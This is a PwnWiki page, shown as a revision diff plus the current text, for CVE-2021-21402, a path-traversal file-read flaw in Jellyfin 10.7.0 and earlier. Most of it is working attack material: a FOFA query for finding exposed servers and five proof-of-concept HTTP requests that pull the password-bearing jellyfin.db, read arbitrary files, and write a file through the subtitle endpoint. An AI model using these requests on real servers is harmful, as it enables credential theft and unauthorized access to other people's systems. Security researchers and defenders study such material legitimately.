Difference between revisions of "CVE-2021-21402 Jellyfin 任意文件讀取漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> jellyfin<=10.7.0 </pre> ==FOFA== <pre> title="Jellyfin" </pre> ==POC1== <translate> 從服務器下載帶...")
 
(Marked this version for translation)
 
Line 2: Line 2:
  
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
  
Line 17: Line 17:
 
==POC1==
 
==POC1==
 
<translate>
 
<translate>
 +
<!--T:2-->
 
從服務器下載帶有密碼的<code>jellyfin.db</code>
 
從服務器下載帶有密碼的<code>jellyfin.db</code>
 
</translate>
 
</translate>
Line 42: Line 43:
 
==POC4==
 
==POC4==
 
<translate>
 
<translate>
 +
<!--T:3-->
 
要下載的POC <code>c:tempfilename.jpg</code>
 
要下載的POC <code>c:tempfilename.jpg</code>
 
</translate>
 
</translate>

Latest revision as of 12:04, 8 April 2021

Other languages:

影響版本

jellyfin<=10.7.0

FOFA

title="Jellyfin"


POC1

從服務器下載帶有密碼的jellyfin.db

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host: x.x.x.x
accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Referer: http://x.x.x.x/web/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

POC2

GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1

POC3

GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

POC4

要下載的POC c:tempfilename.jpg

GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1 
GET /Images/Ratings/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1


POC5

POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1
...
X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="..."
...

{"language":".\..\","format":".\..\test.bin","isForced":false,"data":"base64 encoded data"}